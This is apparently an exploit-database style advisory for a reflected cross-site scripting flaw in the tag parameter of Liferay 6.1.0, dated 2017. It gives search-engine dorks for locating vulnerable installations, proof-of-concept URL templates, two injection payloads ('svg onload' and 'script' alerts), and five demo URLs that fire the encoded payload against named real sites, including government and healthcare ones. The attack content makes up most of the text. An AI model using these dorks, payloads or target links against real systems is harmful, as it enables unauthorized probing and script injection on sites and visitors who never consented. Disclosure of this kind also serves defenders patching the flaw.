[+] Title: Liferay 6.1.0 tags Cross Site Scripting (XSS)
[+] Date: 2017-12-22
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.Liferay.com
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: p_r_p_564233524_tag=
[+] Vulnerable Parameter: Get Method
[+} Dorks : inurl:p_r_p_564233524_tag=
intext:"Content with tag"
### POC:
[+} http://Site/home?p_p_id=[]&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=[]&p_p_col_count=[]&p_r_p_564233524_tag=[XSS]
[+} http://Site/[Another name]?p_p_id=[]&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=[]&p_p_col_count=[]&p_r_p_564233524_tag=[XSS]
### Xss Alert Code: "><svg onload=alert(/xss/)>
'><script>alert('xss');</script>
And Etc.
### Demo:
[+] http://antares.crea.gov.it:8080/en/tagcloud?p_p_id=148_INSTANCE_OFaFgv1XLKmW&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=5&p_p_col_count=6&p_r_p_564233524_resetCur=true&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://liferayportal.ir/web/pdn/19?p_p_id=101_INSTANCE_35mBiQIthh4N&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=2&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://www.carpentaria.qld.gov.au/home?p_p_id=101_INSTANCE_pUO347Uam9DO&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-3&p_p_col_count=1&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://www.alliance-healthcare.co.uk/latest-news?p_p_id=101_INSTANCE_jL0I&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
[+] http://www.acmotec.com/ricerca-tags.html?p_p_id=148_INSTANCE_4LMOXz4UkLZN&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=4&p_p_col_count=6&p_r_p_564233524_resetCur=true&p_r_p_564233524_tag=%E2%80%9D%3E%3Csvg%20onload=alert(/XSS/)%3E
### Special Thanks:
[+] CertCC.ir
[+] Gucert.ir